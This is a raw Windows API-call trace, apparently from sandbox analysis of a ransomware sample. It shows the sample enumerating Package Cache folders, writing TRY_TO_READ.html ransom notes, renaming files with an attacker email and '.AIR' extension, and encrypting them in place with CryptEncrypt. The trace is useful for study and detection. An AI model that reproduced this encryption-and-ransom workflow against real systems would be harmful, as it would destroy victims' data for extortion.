	[0107.239] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.465] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x57c
	[0107.465] GetProcessHeap () returned 0x540000
	[0107.465] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0107.465] GetFileSizeEx (in: hFile=0x57c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=654) returned 1
	[0107.465] SetFilePointer (in: hFile=0x57c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x28e
	[0107.465] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.465] GetProcessHeap () returned 0x540000
	[0107.465] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.465] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.466] WriteFile (in: hFile=0x57c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.467] WriteFile (in: hFile=0x57c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.467] WriteFile (in: hFile=0x57c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.468] ReadFile (in: hFile=0x57c, lpBuffer=0x5db0d8, nNumberOfBytesToRead=0x28e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db0d8*, lpNumberOfBytesRead=0x3a1f778*=0x28e, lpOverlapped=0x0) returned 1
	[0107.468] SetFilePointer (in: hFile=0x57c, lDistanceToMove=-654, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0107.468] WriteFile (in: hFile=0x57c, lpBuffer=0x3a20048*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesWritten=0x3a1f778*=0x28e, lpOverlapped=0x0) returned 1
	[0107.468] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b03e0
	[0107.468] FindNextFileW (in: hFindFile=0x37b03e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.468] FindNextFileW (in: hFindFile=0x37b03e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1
	[0107.468] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x580
	[0107.469] FindNextFileW (in: hFindFile=0x37b03e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6bf7fb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.470] FindNextFileW (in: hFindFile=0x37b03e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6bf7fb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.470] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0420
	[0107.470] FindNextFileW (in: hFindFile=0x37b0420, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.470] FindNextFileW (in: hFindFile=0x37b0420, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a127460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1c821ca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x29a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1
	[0107.470] FindNextFileW (in: hFindFile=0x37b0420, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6bf7fb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.470] FindNextFileW (in: hFindFile=0x37b0420, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a0db1a0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1073de80, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x710a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1
	[0107.470] FindNextFileW (in: hFindFile=0x37b0420, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a0db1a0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1073de80, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x710a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0
	[0107.470] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.470] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.470] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe", dwFileAttributes=0x80) returned 1
	[0107.471] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned 89
	[0107.471] GetProcessHeap () returned 0x540000
	[0107.471] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x118) returned 0x57fb28
	[0107.471] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"
	[0107.471] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.471] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.473] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584
	[0107.473] GetProcessHeap () returned 0x540000
	[0107.473] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0107.473] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=463016) returned 1
	[0107.473] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x710a8
	[0107.474] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.474] GetProcessHeap () returned 0x540000
	[0107.474] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.474] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.474] WriteFile (in: hFile=0x584, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.476] WriteFile (in: hFile=0x584, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.476] WriteFile (in: hFile=0x584, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.478] ReadFile (in: hFile=0x584, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x710a8, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x710a8, lpOverlapped=0x0) returned 1
	[0107.491] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.491] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.491] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm", dwFileAttributes=0x80) returned 1
	[0107.492] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned 82
	[0107.492] GetProcessHeap () returned 0x540000
	[0107.492] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a) returned 0x57fb28
	[0107.492] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"
	[0107.492] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.492] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.496] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584
	[0107.496] GetProcessHeap () returned 0x540000
	[0107.496] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0107.496] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=666) returned 1
	[0107.496] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x29a
	[0107.496] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.496] GetProcessHeap () returned 0x540000
	[0107.496] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.496] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.499] WriteFile (in: hFile=0x584, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.500] WriteFile (in: hFile=0x584, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.501] WriteFile (in: hFile=0x584, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.501] ReadFile (in: hFile=0x584, lpBuffer=0x5db0d8, nNumberOfBytesToRead=0x29a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db0d8*, lpNumberOfBytesRead=0x3a1f778*=0x29a, lpOverlapped=0x0) returned 1
	[0107.501] SetFilePointer (in: hFile=0x584, lDistanceToMove=-666, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0107.501] WriteFile (in: hFile=0x584, lpBuffer=0x3a20048*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesWritten=0x3a1f778*=0x29a, lpOverlapped=0x0) returned 1
	[0107.501] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0460
	[0107.501] FindNextFileW (in: hFindFile=0x37b0460, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.501] FindNextFileW (in: hFindFile=0x37b0460, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1
	[0107.501] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588
	[0107.503] FindNextFileW (in: hFindFile=0x37b0460, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6bf7fb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.503] FindNextFileW (in: hFindFile=0x37b0460, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6bf7fb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.503] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b04a0
	[0107.503] FindNextFileW (in: hFindFile=0x37b04a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.504] FindNextFileW (in: hFindFile=0x37b04a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1
